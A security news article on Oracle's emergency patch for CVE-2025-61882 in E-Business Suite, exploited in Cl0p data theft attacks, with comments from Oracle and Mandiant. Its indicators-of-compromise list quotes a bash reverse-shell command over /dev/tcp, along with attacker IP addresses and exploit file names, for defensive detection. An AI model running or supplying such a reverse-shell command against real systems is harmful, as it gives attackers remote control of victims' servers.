Headline
Oracle Rushes Patch for CVE-2025-61882 After Cl0p Exploited It in Data Theft Attacks
Oracle has released an emergency update to address a critical security flaw in its E-Business Suite that it said has been exploited in the recent wave of Cl0p data theft attacks. The vulnerability, tracked as CVE-2025-61882 (CVSS score: 9.8), concerns an unspecified bug that could allow an unauthenticated attacker with network access via HTTP to compromise and take control of the Oracle
Vulnerability / Threat Intelligence
Oracle has released an emergency update to address a critical security flaw in its E-Business Suite that it said has been exploited in the recent wave of Cl0p data theft attacks.
The vulnerability, tracked as CVE-2025-61882 (CVSS score: 9.8), concerns an unspecified bug that could allow an unauthenticated attacker with network access via HTTP to compromise and take control of the Oracle Concurrent Processing component.
“This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password,” Oracle said in an advisory. “If successfully exploited, this vulnerability may result in remote code execution.”
In a separate alert, Oracle’s Chief Security Officer Rob Duhart said the company has released fixes for CVE-2025-61882 to “provide updates against additional potential exploitation that were discovered during our investigation.”
As indicators of compromise (IoCs), the technology shared the following IP addresses and artifacts, indicating the likely involvement of the Scattered LAPSUS$ Hunters group as well in the exploit -
- 200.107.207[.]26 (Potential GET and POST activity)
- 185.181.60[.]11 (Potential GET and POST activity)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Establish an outbound TCP connection over a specific port)
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
News of the Oracle zero-day comes days after reports emerged of a new campaign likely undertaken by the Cl0p ransomware group targeting Oracle E-Business Suite. Google-owned Mandiant described the ongoing activity as a “high-volume email campaign” launched from hundreds of compromised accounts.
In a post shared on LinkedIn, Charles Carmakal, CTO of Mandiant at Google Cloud, said “Cl0p exploited multiple vulnerabilities in Oracle EBS which enabled them to steal large amounts of data from several victims in August 2025,” adding “multiple vulnerabilities were exploited including vulnerabilities that were patched in Oracle’s July 2025 update as well as one that was patched this weekend (CVE-2025-61882).”
“Given the broad mass zero-day exploitation that has already occurred (and the n-day exploitation that will likely continue by other actors), irrespective of when the patch is applied, organizations should examine whether they were already compromised,” Carmakal noted.
(This is a developing story. Please check back for more details.)
Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
Related news
Every week, the cyber world reminds us that silence doesn’t mean safety. Attacks often begin quietly — one unpatched flaw, one overlooked credential, one backup left unencrypted. By the time alarms sound, the damage is done. This week’s edition looks at how attackers are changing the game — linking different flaws, working together across borders, and even turning trusted tools into weapons.
Oracle on Saturday issued a security alert warning of a fresh security flaw impacting its E-Business Suite that it said could allow unauthorized access to sensitive data. The vulnerability, tracked as CVE-2025-61884, carries a CVSS score of 7.5, indicating high severity. It affects versions from 12.2.3 through 12.2.14. "Easily exploitable vulnerability allows an unauthenticated attacker with
Dozens of organizations may have been impacted following the zero-day exploitation of a security flaw in Oracle's E-Business Suite (EBS) software since August 9, 2025, Google Threat Intelligence Group (GTIG) and Mandiant said in a new report released Thursday. "We're still assessing the scope of this incident, but we believe it affected dozens of organizations," John Hultquist, chief analyst of
Cyber threats are evolving faster than ever. Attackers now combine social engineering, AI-driven manipulation, and cloud exploitation to breach targets once considered secure. From communication platforms to connected devices, every system that enhances convenience also expands the attack surface. This edition of ThreatsDay Bulletin explores these converging risks and the safeguards that help
CrowdStrike on Monday said it's attributing the exploitation of a recently disclosed security flaw in Oracle E-Business Suite with moderate confidence to a threat actor it tracks as Graceful Spider (aka Cl0p), and that the first known exploitation occurred on August 9, 2025. The exploitation involves the exploitation of CVE-2025-61882 (CVSS score: 9.8), a critical vulnerability that facilitates
The cyber world never hits pause, and staying alert matters more than ever. Every week brings new tricks, smarter attacks, and fresh lessons from the field. This recap cuts through the noise to share what really matters—key trends, warning signs, and stories shaping today’s security landscape. Whether you’re defending systems or just keeping up, these highlights help you spot what’s coming